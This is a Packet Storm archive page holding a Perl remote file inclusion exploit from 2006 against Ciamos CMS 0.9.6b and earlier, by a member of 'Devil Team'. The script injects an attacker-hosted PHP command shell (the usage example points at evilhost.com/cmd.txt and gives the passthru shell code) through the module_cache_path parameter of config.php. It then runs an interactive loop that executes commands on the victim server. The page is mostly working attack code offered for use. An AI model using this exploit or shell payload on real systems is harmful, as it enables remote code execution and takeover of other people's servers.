what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ciamosCMS096b-rfi.txt

ciamosCMS096b-rfi.txt
Posted Oct 9, 2006
Authored by Kacper | Site rahim.webd.pl

Ciamos CMS versions 0.9.6b and below remote file inclusion exploit that makes use of config.php.

tags | exploit, remote, php, code execution, file inclusion
SHA-256 | 43323c3e6e5aea4a011f064243a2cb40a423b9c2354b0b4212a3e2340c31f5e0

ciamosCMS096b-rfi.txt

Change Mirror Download
#!/usr/bin/perl

use LWP::UserAgent;

#::::::::: :::::::::: ::: ::: ::::::::::: :::
#:+: :+: :+: :+: :+: :+: :+:
#+:+ +:+ +:+ +:+ +:+ +:+ +:+
#+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
#+#+ +#+ +#+ +#+ +#+ +#+ +#+
##+# #+# #+# #+#+#+# #+# #+#
########## ########## ### ########### ##########
#::::::::::: :::::::::: ::: :::: ::::
# :+: :+: :+: :+: +:+:+: :+:+:+
# +:+ +:+ +:+ +:+ +:+ +:+:+ +:+
# +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
# +#+ +#+ +#+ +#+ +#+ +#+
# #+# #+# #+# #+# #+# #+#
# ### ########## ### ### ### ###
#
#
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Ciamos CMS 0.9.6b
#- [Script site: https://sourceforge.net/projects/ciamos
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Find by: Kacper (a.k.a Rahim)
#+
#- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
#+
#- Contact: kacper1964@yahoo.pl
#- or
#- https://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
#- SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios
#-
#- Greetz for all users DEVIL TEAM IRC Channel !!
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Z Dedykacja dla osoby,
#- bez ktorej nie mogl bym zyc...
#- K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# usage:
# perl exploit.pl <Ciamos Locaction> <shell location> <shell cmd>
#
# perl exploit.pl https://site.com/[Ciamos_Path]/ https://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
###################################################




$sciezka = $ARGV[0];

$sciezkacmd = $ARGV[1];

$komenda = $ARGV[2];

if($sciezka!~/https:\/\// || $sciezkacmd!~/https:\/\// || !$komenda){usage()}

head();

while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET=>$sciezka.'modules/forum/include/config.php?module_cache_path='.$sciezkacmd.'?&'.$komenda.'='.$cmd)or die "\nCouldNot connect\n";
$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\nEnter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot executea blank command in <b>/)

{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}

elsif ($return =~/^<br.\/>.<b>Warning/) {print "\nInvalid Command\n\n"}

if($return =~ /(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/)
{

$finreturn = $1;
$finreturn=~ tr/[ê]/[\n]/;
print "\r\n$finreturn\n\r";
last;


}
else {print "[shell] \$";}}}last;

sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "+ - - [DEVIL TEAM THE BEST POLISH TEAM] - - +\n";
print "+Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit+\n";
print "+ https://www.rahim.webd.pl/ +\n";
print "+ Find by: Kacper (a.k.a Rahim) +\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}
sub usage()
{
head();
print " Usage: perl exploit.pl <Ciamos Locaction> <shell location> <shell cmd>\r\n\n";
print " <Ciamos Locaction> - Full path to Ciamos ex: https://www.site.com/Ciamos/\r\n";
print " <shell location> - Path to cmd Shell e.g https://www.evilhost.com/cmd.txt\r\n";
print " <shell cmd> - Command variable used in php shell \r\n";
print " ============================================================================\r\n";
print " Find by: Kacper (a.k.a Rahim) \r\n";
print " https://www.rahim.webd.pl/ \r\n";
print " Special Greetz: DragonHeart ;-) \r\n";
print " ============================================================================\r\n";

exit();
}

#Pozdrawiam wszystkich ;-)
#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close